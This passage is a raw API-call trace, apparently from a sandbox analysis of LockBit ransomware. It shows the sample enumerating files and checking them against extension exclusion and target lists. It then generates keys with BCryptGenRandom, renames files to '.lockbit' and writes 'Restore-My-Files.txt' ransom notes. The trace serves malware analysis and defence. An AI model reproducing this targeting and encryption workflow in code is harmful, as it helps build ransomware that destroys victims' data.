returned -1 [0120.664] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.665] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.665] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.665] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0090027.WMF") returned 1 [0120.665] lstrcmpiW (lpString1="ntldr", lpString2="J0090027.WMF") returned 1 [0120.665] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0090027.WMF") returned 1 [0120.665] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0090027.WMF") returned -1 [0120.665] lstrcmpiW (lpString1="autorun.inf", lpString2="J0090027.WMF") returned -1 [0120.665] lstrcmpiW (lpString1="thumbs.db", lpString2="J0090027.WMF") returned 1 [0120.665] lstrcmpiW (lpString1="iconcache.db", lpString2="J0090027.WMF") returned -1 [0120.665] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.665] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned=".WMF" [0120.665] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.665] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.665] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.665] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.665] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.665] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.665] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.665] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.665] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.665] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.665] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.665] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.665] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.666] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.666] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.666] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.666] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.666] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.666] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.666] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.666] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.666] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.666] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.666] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.666] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.666] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.666] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.666] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.666] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF.lockbit") returned 72 [0120.666] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090027.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0120.667] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.667] malloc (_Size=0x40068) returned 0x3e70008 [0120.667] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=21268) returned 1 [0120.667] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.667] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0120.667] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.668] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0120.668] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0120.713] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.713] malloc (_Size=0xa6) returned 0x77d7a8 [0120.713] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0120.713] free (_Block=0x77d7a8) [0120.713] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.714] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.714] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.714] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x562d5870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb758, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0090087.WMF", cAlternateFileName="")) returned 1 [0120.714] lstrcmpiW (lpString1=".", lpString2="J0090087.WMF") returned -1 [0120.714] lstrcmpiW (lpString1="..", lpString2="J0090087.WMF") returned -1 [0120.714] PathFindExtensionW (pszPath="J0090087.WMF") returned=".WMF" [0120.714] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.714] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.714] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.714] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.714] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.714] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.714] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.714] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.714] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.714] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.714] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.714] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.714] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.714] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.714] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.715] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.715] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0090087.WMF") returned 1 [0120.716] lstrcmpiW (lpString1="ntldr", lpString2="J0090087.WMF") returned 1 [0120.716] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0090087.WMF") returned 1 [0120.716] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0090087.WMF") returned -1 [0120.716] lstrcmpiW (lpString1="autorun.inf", lpString2="J0090087.WMF") returned -1 [0120.716] lstrcmpiW (lpString1="thumbs.db", lpString2="J0090087.WMF") returned 1 [0120.716] lstrcmpiW (lpString1="iconcache.db", lpString2="J0090087.WMF") returned -1 [0120.716] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.716] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF") returned=".WMF" [0120.716] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.716] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.716] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.717] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.717] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.717] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.717] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.717] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.717] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.717] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.717] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.717] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF.lockbit") returned 72 [0120.717] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090087.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0120.717] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.718] malloc (_Size=0x40068) returned 0x3df0008 [0120.718] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=46936) returned 1 [0120.718] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.718] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0120.718] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.718] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.718] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0120.719] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0120.726] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.729] malloc (_Size=0xa6) returned 0x77d7a8 [0120.729] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.730] free (_Block=0x77d7a8) [0120.730] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090087.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.730] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.730] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.730] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x562d5870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3d90, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0090089.WMF", cAlternateFileName="")) returned 1 [0120.730] lstrcmpiW (lpString1=".", lpString2="J0090089.WMF") returned -1 [0120.730] lstrcmpiW (lpString1="..", lpString2="J0090089.WMF") returned -1 [0120.730] PathFindExtensionW (pszPath="J0090089.WMF") returned=".WMF" [0120.730] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.730] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.730] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.730] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.730] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.730] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.730] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.731] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.731] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0090089.WMF") returned 1 [0120.732] lstrcmpiW (lpString1="ntldr", lpString2="J0090089.WMF") returned 1 [0120.732] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0090089.WMF") returned 1 [0120.732] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0090089.WMF") returned -1 [0120.732] lstrcmpiW (lpString1="autorun.inf", lpString2="J0090089.WMF") returned -1 [0120.732] lstrcmpiW (lpString1="thumbs.db", lpString2="J0090089.WMF") returned 1 [0120.732] lstrcmpiW (lpString1="iconcache.db", lpString2="J0090089.WMF") returned -1 [0120.732] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.732] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned=".WMF" [0120.732] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.732] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.732] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.733] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.733] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.733] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.733] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.733] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.733] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.733] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.733] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.733] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.733] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.733] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.733] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF.lockbit") returned 72 [0120.733] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090089.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0120.736] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.736] malloc (_Size=0x40068) returned 0x1ff1e60 [0120.736] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=15760) returned 1 [0120.736] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.737] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0120.737] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.737] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0120.737] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.739] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.739] malloc (_Size=0xa6) returned 0x77d7a8 [0120.739] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.740] free (_Block=0x77d7a8) [0120.740] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.740] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.740] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 